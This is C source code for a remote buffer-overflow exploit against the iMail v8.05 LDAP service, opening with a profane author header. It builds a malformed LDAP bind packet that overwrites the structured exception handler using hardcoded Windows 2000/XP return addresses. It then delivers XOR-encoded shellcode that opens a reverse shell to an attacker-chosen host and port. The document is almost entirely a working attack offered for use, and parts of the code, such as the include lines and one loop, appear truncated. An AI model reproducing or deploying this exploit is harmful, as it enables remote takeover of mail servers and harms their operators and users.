/******************************************************************/ /* [Crpt] iMail v8.05 LDAP service remote sploit by kralor [Crpt] */ /******************************************************************/ /* fuck iDefense */ /* fuck k-otik */ /* fuck private exploits */ /* in other words, fuck you all security money makers and */ /* private exploits exchangers. */ /* lolo xXx for her patience while these long nights coding */ /* and for errr.. you know what :) */ /******************************************************************/ /* informations: www.coromputer.net,irc undernet #coromputer */ /******************************************************************/ #include #include #include #include #include #pragma comment (lib,"ws2_32") // EBP+~0xB6 (ebp+ecx-4) (Structed Exception Handler) #define SEH_ADDR 0x50FFFFFF /* for win2k offset: --- jmp dword ptr [ebx] */ #define HIJACKED_2K_EVL 0x0043BD8B // (8.05 eval) #define HIJACKED_2K_EXP 0x1000F7B0 // (8.05 express) #define HIJACKED_2K_PRO 0x1000F7A9 // (8.05 pro (not sure :))) /* for winXP offset: --- pop esi --- pop ebx --- ret */ #define HIJACKED_XP_EVL 0x0041F5C7 // (8.05 eval) #define HIJACKED_XP_EXP 0x100106BC // (8.05 express) #define HIJACKED_XP_PRO 0x100103CC // (8.05 pro) (not sure :))) // sequence of 4 opcodes #define HOP 0xd4 // host opcode #define POP 0xd7 // port opcode int cnx(char *host, int port) { int sock; struct sockaddr_in yeah; struct hostent *she; sock=socket(AF_INET,SOCK_STREAM,0); if(!sock) { printf("error: unable to create socket\r\n"); return 0; } yeah.sin_family=AF_INET; yeah.sin_addr.s_addr=inet_addr(host); yeah.sin_port=htons((u_short)port); if((she=gethostbyname(host))!=NULL) { memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length); } else { if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) { printf("error: cannot resolve host\r\n"); return 0; } } printf("[+] Connecting to %-30s ...",host); if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) { printf("error: connection refused\r\n"); return 0; } printf("Done\r\n"); return sock; } void banner(void) { printf("\r\n [Crpt] iMail LDAP service v3.12.10.3/v8.05 remote sploit by kralor [Crpt]\r\n"); printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n"); return; } void syntax(char *prog) { printf("\r\nsyntax: %s [OSver]\r\n\r\n",prog); printf("\t0\t8.05 professional\r\n"); printf(" \t1\t8.05 express\r\n"); printf(" \t2\t8.05 evaluation\r\n---\r\n"); printf("[OSver] \t0\twindows 2000 universal [default]\r\n"); printf(" \t1\twindows XP universal\r\n"); exit(0); } int main(int argc, char *argv[]) { int sock,bytes,target,osver=0; WSADATA wsaData; char buffer[8095]; unsigned long host,port; unsigned int i; char req1[] = "\x30\x82" /* bind request */ "\x0a\x3d" /* bind req len */ /* msg id */ "\x02" /* integer */ "\x01" /* length */ "\x01" /* value */ "\x60" /* bind request */ "\x82" /* msg length 2bytes */ "\x01\x36" /* msg length */ /* LDAP ver */ "\x02" /* integer */ "\xff" /* length */ "\x03" /* value */ "\x05\x00" /* DN NULL */ "\x80\x00"; /* Auth simple */ char shellc0de[] = /* sizeof(shellc0de+xorer) == 334 bytes */ /* classic xorer */ "\x90" "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66" "\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa" /* reverse remote shell */ "\x14\x79\x05\x94\x95\x95\x1e\x61\xc0\xc3\xf1\x34\xa5\x95\x95\x95" "\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e\x50\xcb\xc8" "\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95\x95\xfd\xa6" "\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d\xc2\xfd\x4c" "\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4\xc4\xd4\xc4" "\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5\x7d\xec\x95" "\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e\x59\xff\x85" "\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3\xa5\x6a\xa3" "\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b\x16\x79\xc1" "\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68\x53\xd1\xb1" "\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1\x1c\xd1\xb1" "\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85\xc1\xc5\xc4" "\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b\x6a\xa3\xfd" "\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0\xc3\xc2\x1e" "\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e\xdf\x8d\x1e" "\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6\x6a\x69\xa6" "\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67\xae\xe9\xb1" "\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e\xcf\x89\x96" "\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca\xcb\xc8\xce" "\x57\x91\x95"; banner(); if(argc<5||argc>6) syntax(argv[0]); host=inet_addr(argv[2])^0x95959595; port=atoi(argv[3]); if(!isdigit(argv[4][0])||strlen(argv[4])>1) { printf("error: must be one digit\r\n"); syntax(argv[0]); return -1; } target=atoi(argv[4]); if(target<0||target>2) { printf("error: must be 0, 1 or 2\r\n"); syntax(argv[0]); return -1; } if(argc==6) { if(!isdigit(argv[5][0])||strlen(argv[5])>1) { printf("error: [OSver] must be one digit\r\n"); syntax(argv[0]); return -1; } osver=atoi(argv[5]); if(osver<0||osver>1) { printf("error: [OSver] must be 0 or 1\r\n"); syntax(argv[0]); return -1; } } if(port<=0||port>65535) { printf("error: must be between 1 and 65535\r\n"); syntax(argv[0]); return -1; } port=htons((unsigned short)port); port=port<<16; port+=0x0002; port=port^0x95959595; for(i=0;i */ strncpy(buffer,req1,13); memset(&buffer[13],0x90,7010); *(unsigned long*)&buffer[13] = SEH_ADDR; if(!osver) { if(!target) *(unsigned long*)&buffer[17] = HIJACKED_2K_PRO; else if(target==1) *(unsigned long*)&buffer[17] = HIJACKED_2K_EXP; else *(unsigned long*)&buffer[17] = HIJACKED_2K_EVL; } else { if(!target) *(unsigned long*)&buffer[17] = HIJACKED_XP_PRO; else if(target==1) *(unsigned long*)&buffer[17] = HIJACKED_XP_EXP; else *(unsigned long*)&buffer[17] = HIJACKED_XP_EVL; } *(unsigned long*)&buffer[21] = 0x90909013; // to avoid 0x00 on winXP memcpy(&buffer[200],shellc0de,sizeof(shellc0de)-1); memcpy(&buffer[7000+23],&req1[10],4); printf("[+] Sending magic packet ..."); bytes=send(sock,buffer,sizeof(buffer)-1,0); printf("Done\r\n"); if(bytes==0) { printf("error: send()\r\n"); } closesocket(sock); return 0; }

��ŷ��